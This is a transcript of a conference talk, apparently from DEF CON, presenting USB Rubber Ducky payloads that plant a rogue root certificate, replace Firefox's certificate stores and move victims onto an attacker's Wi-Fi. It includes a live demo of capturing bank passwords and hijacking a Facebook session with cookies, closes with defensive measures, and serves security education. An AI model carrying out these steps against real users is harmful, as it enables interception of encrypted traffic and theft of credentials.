 Hello, everyone. Welcome. Good afternoon. Thanks for coming. Thanks to DevCon for having me. My name is Jeremy Duro. Today I'm going to present to you guys on two different variants of an attack that I made for the USB rubber ducky. What we got here? One minute. Or is that just their screen? Are these screens screwed up too? I know just that one. Alright, cool. Alright, so we made two different payloads for the USB rubber ducky that will decrypt the Wi-Fi communications. Yeah, so before we get started though, quick disclaimer. I'm here on my own behalf. It's my own opinions. Not my employer, no one else. So we get the legal jargon out of the way. Oh, so what are we doing here? There we go. Sorry guys. Alright, so about me. A little bit of background. We're more than a decade of experience in the IT security industry. In those 10 years plus I've worked for a couple different sectors. I started my career out with the Department of Defense working for the Army at a data center hosting both class and unclass material. Left out of there to go work in the energy sector defending a nuclear power facility. And then currently I'm working in the financial sector as a network security engineer for Gemworth Financial. And just a little side note there, a little fun fact. I'm a hobby. I enjoy building, driving and destroying demolition derby cars. So if there's any gear heads in the audience, feel free to find me afterwards. We'll talk cars. So the presentation outline, what we're going to talk about. From a high level we're going to first talk about what is the USB rubber ducky for those who are not familiar. Then we're going to talk about how the attack actually works. And then we're going to get into the details of each of the different payloads. So we'll first talk about the keyboard payload. And then we'll talk about the one that involves both keyboard and USB mass storage. I'll demo the second variant of the attack. And if we have any time for questions, maybe we'll take some questions, but it's probably going to take the full time. All right, so again, those are not familiar with the rubber ducky in a simple description of what it is. Think about if you were able to take a keyboard and apply some type of logic or some type of memory to it to tell it what to send to a victim's machine when you plug it in, and you ultimately have the USB rubber ducky. So these devices are sold by hack 5. Those are not familiar. They're actually selling products here. Run by and support them. Really good group of guys. I think they're like 40 bucks or a little better than 40 bucks. So it's pretty cheap. So here's what the rubber ducky looks like. You'll notice that it is a very common form factor. So notice there on the far right for you guys. You know, if you've been to any of the trade shows, like any of the IT security stuff, typically as vendors hand out swag, a lot of times it will be that's the actual form factor. So if you go on to some of those, you look and enjoy. You probably have one that looks very similar to that. Inside the enclosure, you'll see that it has a micro SD card storage area, as well as a little microprocessor, a little 32 bit chip. And again, that's what kind of drives the memory part of the brain from that previous slide. And to kind of talk about the different ways that the ducky behaves, it comes shipped with the duck firmware, which is that kind of first bullet there. And again, that is just keyboard input. But there's also, out there, this fat duck detour duck. But make note of that last variant of the firmware as well. That involves having both USB mass storage at your disposal when you plug the device in as well as programmable keyboard. So a lot of powerful things can be done once you start adding mass to origin. We'll see that in a demo later. But for those that are like, you know, thinking, well, this must be a hack five presentation. He's trying to pedal their products. You don't have to go with the hack five rubber ducky. There's other options out there. Sammy Camcar, he's actually here, spoke to him last night. So he's got a presentation later today. I recommend you guys support him. Really smart guy. But he developed the USB drive-by. So he does the same kind of mentality with the teensy device. So check his stuff out if you don't want to spring for the 40-some-odd dollars for the rubber ducky. As well as last year at Black Hat, Carson Noll and Jacob Lul did the bad USB. Those that are familiar with that term. And then later at DerbyCon, Adam called on Brandon Wilson and released code so that you can take an off-the-shelf variant of a flash drive, flash their firmware to it and more or less it will run the same script in language that the rubber ducky run. So that's more or less free if you have those flash drives laying around. All right, so how this attack works. This slide just depicts the victim having a wireless connection to the little radio there and you see the lock. So any SSL connections they have are working as they should. Everything's encrypted. Anything that they're supposed to be encrypted is encrypted. It's the standard connection before the attack. Then comes the rubber ducky. If the rubber ducky was, the USB flash drive was plugged in. First thing that's going to happen is there's going to be a trusted certificate that's loaded on that victim's machine. After the trusted certificate is loaded, it will then move the wireless connection over to a man in the middle machine, which I will be running. If you think about this in your head, what just happened, not only are we now man in the middle, but since we provided that key, there's nothing that can encrypt. It's kind of a bad situation for that victim. First question I had when I bought it was, is this a novelty device? It's great to rick roll your buddies with it. That's cool. But does this thing really have a place in the corporate environment for say a real CT, an actual pen test? Or is this a real useful tool for a black hat for that matter? I was kind of astounded to see these numbers. You may have heard these before, but DHS had the same thought. They paid a third party to perform a study where they dropped flash drives around public areas, whether it be smoking areas, walkways, what have you, and they found that an astounding 60% of people plugged them in once they picked them up. Well, that's scary enough, but then if you look at the last bullet there, if they had an official logo to it, that number jumped 90%. So the moral of the story here is that you really don't need any clever social engineering for this attack to work. I mean, if someone really wanted to be bad and do this attack, for $400, you've got 10 of them, someone's going to plug it in, your odds are pretty good. And speaking of official logo, if you recall the form factor of what the Rubber Ducky ships, this is just a quick Google search of marketing USB drive or something. Ta-da! First one came up, the exact same form factor that the Rubber Ducky ships in. For a couple bucks, you can put whatever logo you want on your Rubber Ducky because it's just a little shield there that connects to it. And you're up to your 90% mark according to a DHS study. So pretty useful stuff. I kind of want to talk about now why I actually made this payload. You know, there's plenty of good ones already out there. The Rubber Ducky is nothing new. The product's been out there for a while now. And Darren, the guy that runs Hack 5, has a, his GitHub is just full of really good payloads that people have written. But what I found is that most of those, if not all of them would be stopped by the modern defenses that are deployed in most enterprise organizations. So I'm not talking about your, you know, if you're trying to attack the random victim at Starbucks, I'm more focused on corporations and doing this thing in a, you know, a more secure area. And the first one I'll touch on there is antivirus. So a lot of the payloads that are out there will try to pull down a tool of some type. Whether it be, you know, Netcat or try to do some interpreter reverse shell, what have you. Well, you know that's cool and all, but if you pull those down on a company asset, you know, your antivirus is going to light up like a Christmas tree and it's going to stop it in its tracks. I mean, it's too well known at this point. The next bullet there, web filters and proxies. So some of the other attacks, what they'll do is they'll try to make you go out to some open storage place, you know, Dropbox or Box or something like that. Well, most organizations, at least if they're, you know, more of a secure side of things, are going to block those style sites. They're not going to let you go to just any open storage to pull down any random file you want. So that's going to be stopped. Same kind of mentality below with the FTP whitelist. Some of the attacks try to pull down files through FTP. Again, most companies, if they're at the level of any security knowledge at all, they're not going to just allow you to FTP anywhere from any asset in the organization. And then the last bullet there is has nothing to do with corporate security. I'm sure most of you guys are familiar with HSTS, but those that are not, it's kind of a tool that was designed just to stop this style attack. So the old school way of doing man in the middle attacks would be, you know, once you got in the middle of the communication path, you would tell the victim, you know, just go ahead and talk to me in clear text. You know, trust me. Talk clear text to me. You know, you want to talk encrypted to your banking site. Well, I'm telling you to go ahead and load it in HTTP so I can harvest the credentials. And then on the side that's talking to the real banking website you would talk encrypted. And it worked well for a while until things like HSTS came along, which is an actual browser-based security mechanism. It says if you're a member or you're on this list of HSTS-enabled sites, no matter what the man in the middle machine tells you, you must always use encrypted traffic. And that becomes a problem because it kind of thwarts the way that the old school way of attacking took place. And again, all your big sites are doing that. You know, you're a lot of your paid sites like you see PayPal and your social media sites. Even DEF CON implemented this year. So I guess DEF CON has got some super-secret information they don't want someone to get. So let's talk the attack. Enough kind of pre-talk. So the first step is to actually set the man in the middle machine up. Because you have to have something for the victim to connect to. Right? So this is not the focus attack so I'm going to kind of breeze through this stuff. Just to give you an idea of what I used when I set up the demo you're going to see in a minute. I used host APD for the wireless radio. I used DNS mask for the DNS server as well as the DHCP server. IP tables to kind of direct the traffic over to a proxy. And I mentioned the man in the toolkit. So those guys actually have developed some really cool scripts that I used to kind of just adjust their stuff to make it work the way I wanted it. So I mentioned proxies. There's IP tables that move stuff over to a proxy. So you got to think about it. Once you get the connections coming into your man in the middle machine and you've got the radio, it's listening, people are connecting to you. You have to have some way to manipulate the traffic or at least use the traffic. I mean what's the point of sending it through you if you can't do anything with it. So you're going to have to set up some type of proxy. In my example I use Burp Suite. It doesn't mean you have to use Burp Suite. It's just easiest in my opinion. You can use self-strip, squid, mallet, whatever. I do make note here that whatever proxy you want to use for this type of attack, make sure you know how to pull the certificate out, the actual sign in the authority it's using. Because we're going to have to convert that certificate to a base 64 encoding. And I'll get into that in a little bit. So for those that are not familiar with Burp Suite, I'm sure most of you have at least seen it. The configuration I'm using today is very, very simple. I've just got it listening on. All interfaces just picked around the 880 port. And you'll see there that invisible box as they call it is checked. But industry, that's a transparent mode proxy is all it's doing. And I mentioned you had to export your certificate. Well, that's what the little radio, I mean the little button below that there. C8 certificate you click there and you'll kind of go through some dialogue boxes to export the certificate. And when you do that it's going to come out in a Dura formatting. So again this is not a talk about certificates but at least I want to touch on this. The certificate, if it's in Dura formatting, you'll notice that top window there. That's text that I can't enter by keyboard. So I want you to make sure I convert that certificate to something that my ducky can type in easily. So use an open SSL, convert that Dura formatting to a pen formatting to the base 64 encoding. And if it's done right you should look something like in that bottom window. So it's human readable. All letters and numbers. So now we have man in the middle machine. So let's talk about the payload itself that's going to be sent to the victim. So what it's going to first do, it's going to bypass the windows UAC and open a command prompt window. If the user is logged in with admin credentials, it's going to get admin credentials. If they're logged in as user credentials, they're just going to get user credentials. And the test I'm doing today I'm actually have admin creds but I will make note that this will work with user credentials without admin creds. It's just going to have a few extra pop-up boxes along the way. The second step it's going to do is create that cert file so you're going to create a certificate from keyboard input. The same certificate we exported a few minutes ago. Then it's going to add that certificate to the trusted root store using the built-in tool cert util. Then it will create a new wireless profile and then connect to that wireless profile. And then lastly it's going to clean up its tracks. So it's going to delete the files that it made in the process. Alright so before we actually look at the code I kind of wanted to let everyone at least understand how simple this thing is to really write. So DefCon gave me a lot of credit by making me talk to you guys but really it's pretty simple stuff. Again, very straightforward. Delay, delay in millisecond. String, what you're actually typing into the machine, what you activate the payload. And then all your command keys like inner, GUI is the windows command mark. And any question on that, the github that Darren keeps up has pretty much all the documentation needed to any of the commands here that it supports. Alright, so here it actually is the first step in the payload. Kind of broken it out here a little bit. So you'll see how the code kind of works. Delays 10,000 so that's 10,000 milliseconds. That's 10 seconds. And the idea behind that is when you plug the device into a machine the first time you're going to see windows spin in there with the drivers low drivers, low drivers, low drivers. Hopefully it's done in 10 seconds and then it's going to enter the issue of GUI R command. Those are not familiar with GUI R. That's going to open a run dialog box. And it's going to delay 200 milliseconds to allow time for that box to pop up. And then it's going to type a little PowerShell command, start process command verb run as. All that does is open the dialog box. It's in admin credentials if possible. And a little side note here. You'll see now I put a little side note that windows 10 and this is as well as 8. You don't have to do that PowerShell command for those that got the windows 10 and 8 thing. If you just do GUI X and then type a, it opens up an admin command prompt. A little side note. So next up is we're going to have to create that certificate on the victims machine with keyboard input. And the way we're going to do that is we're going to use a built-in tool windows called copycon. Those that are not familiar with copycon, it's copycon file name and anything below is concatenated to the file. You break out of it and now you have a certificate. And I had to put the obligatory picture of the hacker in the presentation. But I noticed earlier when I was going on my slides, this poor guy was having a hard time typing because he's got big, thick winter gloves on. So I don't know. That's what Google search for hacker. Anyway. So we're going to use, in my opinion, is the climax of the attack. So this is the part where it's actually doing bad things. Cert. Util. Add store. Enterprise. So that's added to the machine root store. It's adding that certificate we just created. So if this command succeeds, game over. Lastly, we're going to create an XML file. And again, those are not familiar. Windows with handles, wireless profiles, just a little XML file. So we create an XML file and then we, after we create it, we then connect to it with netsh command. Again, pretty straightforward stuff. And lastly, we'll just delete those XML file and that certificate file we created. All right. So here is what it looks like from the attackers machine. Right. So this is, again, Burp Suite. We're looking at the proxy kind of view there. And I've kind of highlighted there. We're typically going to be interested in post commands. So I've kind of looked at a post command there to Wells Fargo. I'm not picking on Wells Fargo. So hopefully you don't sue me. But any bank would work. And you'll see it under the bottom of the details. You've got user ID and password. Clear text. Right. So that poor person's bank was just compromised. And alternatively, this is what it looks like from the victim's point of view. There have been no pop-ups, no warnings, no errors, no issues, no indication there was anything wrong. And I've even kind of opened up the certificate details to show that this certificate was signed by, you probably can't read that, but it's issued by Portswigger. Those are not familiar Portswiggers company that actually writes Burp Suite. So they put their name in the certificate. But yeah. So really bad day. Internet Explorer got the best of them. But I'm sure some of you in the crowd are like, well, I don't ever use Internet Explorer. I'm cool. I use Chrome. So there's no way you'd get me. Well, here's Chrome. Same deal. Look at their credential. I mean, look at the certificate details. You'll also see signed by Portswigger. And again, same story. No pop-ups, no warnings, no errors, no issues. There's no point transparent to the user. There's no way by at least the certificate anyway you'd ever be able to know something bad had happened. All right. So again, they have no one bunny in their bank account. All right. Firefox though. How about Firefox? The special snowflake that Firefox is. Yeah, yeah. Yeah, clap. Yeah. It was a bad day for me. So I'm glad y'all think it's funny. Yeah. So Firefox. And I'm sure some of you know already why this is the case. So Firefox decided they're not going to trust Windows, Keystore and Trustdoor. That they're going to implement their own Keystore and Trustdoor. So those commands that I issued earlier with AssertUtil, that's all for the Windows certificates. NSS, Labs has the tool you can download to actually manipulate Firefox certs because they have their own Keystore, Trustdoor. But it's not installed on a typical distribution. Therefore it would be very hard to use on a victim's machine. So I kind of banged my head against the wall for a while and you know, my face looked a lot like that image there for quite a bit. Trying to figure out how in the world to get this to work. And I just couldn't come up with anything clever. So that kind of brings me up to the next variant of the attack, the TwinDuck that I referred to earlier. So TwinDuck Firmware, again, just a recap, it mounts both a USB mass storage device as well as that same programmable keyboard mentality we just had before. So to use the TwinDuck firmware, obviously you're going to have to reflash the device. Not a big deal. The other thing is that the other devices are out there how to do that very straightforward. And I will make one little side note here that if you're planning on making some attacks using the TwinDuck firmware, it's not really designed for really fast IOs. So don't be trying to load some massive application up on your microSD card and pull from it through command line because it's going to probably behave a little differently than what you expected. Just a quick side note there. So let's start this attack. What's different this time? We have to set it up. First steps are to create a new Firefox key store trust store and the easiest way to do that is go ahead and infect your own browser. So go ahead and open your own Firefox up and take that certificate that you just exported from your proxy, load it into your own browser. And I've kind of listed here how to do that, I'm sure you all know, but go ahead and click trust the certificate identities from that website. So that way port Twitter can sign anything through Firefox. Okay. After you do that, then you're going to pull your key store and trust store and copy it over to your microSD card. And it's located in the path there listed on the screen. And that variable works for pretty much any basic install. You'll see it uses variables as well as a wildcard.default because it's going to give it some crazy number string.default. So that path right there, if you just would enter that into your machine right now, it would go to your Firefox profile. And you're going to get those two files that are listed in the bottom. You're going to get the key3db and the cert8db, that's your key store and your trust store for Firefox profiles. Alright, so again, from a high level, how does this attack center work now? We've done the pre-work to set it all up. Same as before, it's going to open a command prompt with admin creds if it can get admin creds. It's going to then, this time, a little bit different, it's going to create a script to identify if that master was mapped. Alright, so again, we've got to think about this. We're going to it blind. We don't know what's going to be on the machine once it's plugged in. So it could be mapped to eDrive, fDrive, you know, who knows. So a little script try to find where the Ducky U.S.E. master is located. Then it will create another script, a little VBS script that will run a batch file invisibly. And when I say invisibly, it's just running the background. And the idea behind that is it's quicker to write a script on the screen because it's all done with keyboard input than it is to run the whole, write the whole batch file out. And it just gives you a little less time that text is kind of scrolling across the screen. But what that batch file is going to do, it's going to first add, just like before, it's going to add the Windows Trusted Root certificate. It's going to then overwrite the user's Firefox search and key store. And then it's going to create a new wireless profile, connect to it, clean up. So here's what that batch file looks like just for those that are looking for the code part of the talk. You'll see here, we obviously kill Firefox, we don't want to do anything while it's running. Same commands, add it to the Windows enterprise store, the machine store. And then you'll see that it overwrites the Firefox profiles. And as a quick view, here's what the MicroSD card looks like on my device, I'm going to do a demo. You'll see the XML file, which is the wireless profile. You'll see the cert file, which is what we load the Windows. You'll see the certain key files for Firefox, as well as the batch file we just looked at. So there's the files that are needed to run in the TwinDuck mode. So again, we'll go back to looking at what it looks like from the user's point of view or the victim's point of view. There's the Internet Explorer. Yeah, got them. Chrome, same story, no more money in their bank account. Firefox, yay Firefox. Yeah, sneaky bastard, got you. So you'll see it's also been signed by Portswigger. We got them. Again, because we loaded those trusted certificates into their own key store and trust store. So at this point, I more or less consider the attack successful. We've got all three modern browsers and yeah, they've all been puns. So with that being said, thank you, thank you. So we'll kind of dive into the demonstration now. I kind of want to set this up so it makes somewhat of sense because I obviously don't have a nice environment here to have someone over there getting attacked and show you guys what's going to happen is hopefully no one in the crowd be that guy that tries to mess up my SSID please. If you do whatever, I've got a video but I'd rather do it live. So please don't screw with it. There's going to be the Windows machine which I'm presenting from, that's going to be the victim. So you'll see Windows machines where I'll actually apply the rubber ducky payload but there's going to be a Cali Linux box that's going to have a Davian background to kind of represent which is which. It'll be a Davian background VM that has, I've got a bunch of like USB connections up here, I can't really show you but I've got a USB connection into a hard wire out to the internet as well as a wireless radio that is going to be hosting the SSID from the VM. And when the payload is deployed, hopefully the built in wireless on the Windows machine will connect to that wireless radio. So it's all kind of M1 but it should depict what the attack would look like. Alright, so let's do that now without further ado. So that's what the Windows machine is going to look like. I'm going to change it so you can clone the machines again. You should be able to see my desktop now. Alright, so here's going to be the victim and let's go ahead and pull up super secret password. So before I actually get started, my resolution is all whacked out now but this is the script that I was talking about, the MANA toolkit that I kind of modified. So again for anyone that wants to take note, it's using host APD again, using DNS mask and then using some IP tables to redirect traffic. Alright, so let's actually do that. Let's kick that off. Actually before I kick it off, let me show you again here's the, I've already got BurpSuite up and running so it's just listening on any interface on port 8080 and it's in transparent mode and there's where again where you would go to export those certificates. Alright, so let's go ahead and run that script hit enter to kill me, that's a little brutal. Okay, so at this point what I should see if I were to look, yep, alright there's SSIDBM broadcasting. It's actually trying to connect to it. I'll disconnect from it once it just approved that this does work but so let's disconnect from that. So now again, what I'm going to do is I'm going to restart the payload. So this would be an indicative of me plugging in. I'm a dumb user that picked it up and I decided that oh I found a nice flash drive, let me see what I can do with it. Alright 10 seconds, this is where drivers would be loaded but I already had the drivers on the machine. The payload has now started and it's now done. So that's how long it takes to do its magic. Alright, so there you'll see now it's connecting like it's supposed to be doing. It just takes a little bit. Alright, so you guys are being nice to me not kicking me off there. Appreciate that. So what we're going to do is now we're going to and again you guys already probably know damage is going to be done now that I've got this connection in this shape but just for grams over to a Facebook account that I created just for this presentation here so please don't own my Facebook account. Alright, and then we'll also go again poor Wells Fargo. I could use any other bank but they're not my bank so that's what I chose them. Alright, so let's go for Defcon user and some super secret password login. I hope to god this is no one's password that would be awful. Let's see here. Alright, no, obviously it didn't work. Okay, perfect. So let's kill out of that. Let's just demonstrate. Here we go. Okay, we got some data so the attack is working as we would expect. So let's first look at Wells Fargo. You'll see like I had in the slides. There's the authentication packet. You'll see the post, the off log on. And I'm just going to hear the parameters and I'll scroll a little bit. I hope you can see that. Defcon user, password d3fcon23 so yeah, let's go ahead and transfer all the money out of that account. Got them. Alright, thank you. And now you maybe kind of trash your head like whoa dude you forgot to put a password in Facebook. Good luck getting that password now. You messed the presentation up because it was one of those little collect box leave me always logged in which I think we all kind of know what that means is using authentication cookies. That actually may be even worse because any of the Facebooks, anyone who knows anything about Facebook and how they do their authentication cookies let's see here, drag it up so you can see it a little bit better. But like every packet that you ever send to Facebook you'll see this DATR cookie. That's your authentication cookie. So every time you do anything in Facebook it just sends it over and over and over. So I can click on pretty much any of these posts and you'll see, yeah look there it is again. And there it is again. So what we'll do is we're going to go ahead and say let me just have those cookies for a minute. And then I'll go over here to this account and just to prove there's no shenanigans going on. I'm not logged in. Yeah, see I just refreshed. No one's logged in here. But with the help of a little tool for those that are familiar with grease monkeys is a scripting tool. And I've got the cookie injector script loaded. If I go in here to let's go ahead and take those cookies I just stole and paste them in. Well thank you. Alright. So now we have hijacked the session. Got you. Right? Thank you. So and again the point being there is it's not that Facebook's really your end goal and your attacks but there's so many sites now that are using the authentication cookies. I think that Facebook kind of just drives the point home that anywhere it uses the authentication cookies or passwords really doesn't matter. Once you're encrypted in traffic it's the date is yours. Alright so let's go back to the presentation. I think it's going to see here. Wait for it. Wait for it. Got it. Alright. So now since like I told you guys at the beginning I'm not a fancester. I'm not a security researcher. I am a security engineer. So I am paid to defend against these attacks and not create them. So it's only fair and responsible thing that I talk about is how to stop this kind of attack. Alright so the first bullet I want to touch on here is wireless intrusion prevention systems so WIPS systems. Those are not familiar with those. They're very powerful but this style of attack would not work because as soon as I'd spin up that rogue AP it would start flooding me with DL packets and it just wouldn't work. So if your organization employs some type of WIPS environment you'd have to find some other mechanism to get into traffic to you other than through wireless. Disable mass storage devices. This is becoming more common just because of these I guess there's lots of style attacks. Not to mention DLP concerns. People are starting to disable mass storage but that's also kind of a bummer if you're trying to do that second variant of the attack because if you don't have mass storage available you can't get all three browsers at least the way that I did the payload. And take that kind of mentality a little step further a little more extreme. Some companies even disable USB ports entirely. That would certainly limit the attack because none of the USB style attacks should work if you wanted to turn on. And then this slide I mean this bullet I put it in there. Frankly that bullet could be in any DEF CON talk given this weekend and user training can always be encouraged to be more responsible with X. Just today it's USB usage because that's what I'm talking about. So yeah you can always use more user training to encourage responsible use of technology. Multi-factor authentication Yeah so if I was able to pull this attack off on you and you're using some kind of one time use password or some token based password it's going to be very difficult for me to reuse that credential. So yeah that's another check in the box for why you should use multi-factor authentication. And the last one here it may not be quite so obvious but those familiar with cloud proxy agents a lot of organizations are now starting to deploy them. So on all the corporate assets what that does is it requires the company asset to talk directly out to a cloud resource for their proxy exceptions. And typically it has some type of authentication mechanism built into that. So if I got mental that communication it would probably just break. It just wouldn't allow you to go anywhere. It would encrypt anything because it would have broken your connection. So a couple other things here to consider I use wireless as the mechanism of getting the data to me but that certainly doesn't have to be what you use. You could set up like a proxy that lists it out in the cloud and instead of changing wireless settings you could go in and say let's monkey with some of the proxy settings to have it no matter if it's hardwired, wireless whatever you always connect out to like say AWS proxy listener and you could have the same kind of attack take place. And the benefits there is one again hardwired or wireless but you also don't have to be in physical proximity. So you could deploy this thing and then no matter where they went it would be connected out to like a cloud listener. And you could also increase the authenticity. And what I mean by that is again I made this as just a proof of concept that the files are labeled what they are. You could certainly label them more suspicious things that people would be trying to really click in. Like if I was trying to get more authentic I'd probably put in a file that says like salaries or something and I'd corrupt it so they keep trying to open it. Just about anymore time of that screen before they thought something was fishy. As well as we talked about putting a label on the device you could print out whatever label you were trying to attack so company X put that label on it. Another note here that the syntax will need to be adjusted slightly for whatever your victim base would be. And the reason I say that is certain OS's are going to have different dialog boxes pop up at different times, warnings pop up at different times. As well as timers. So if your timers are on like a try to get it very aggressive on your timers on when things work and you play it into a really slow old machine the timers may not work out right and it'll break the whole attack. So you gotta really play with the timer, play with the syntax but the attack should work pretty much regardless of any version of Windows. And just a quick little shout out for the guys at hack 5. They have a forum out there for people to share collaborate, new payloads, it's a pretty active community so if you're thinking about doing this style of attack or you're looking at new ways to get in this kind of thing I recommend you go check them out because that's where I got a lot of ideas and some of the code that I use for my attack. And with that I'll finish here with please any questions you have email me. I'm not going to try to do the question thing here in this forum it's just too many people. But feel free to get any questions, find me out in the public areas and with that thank you guys all for your attention, I appreciate it.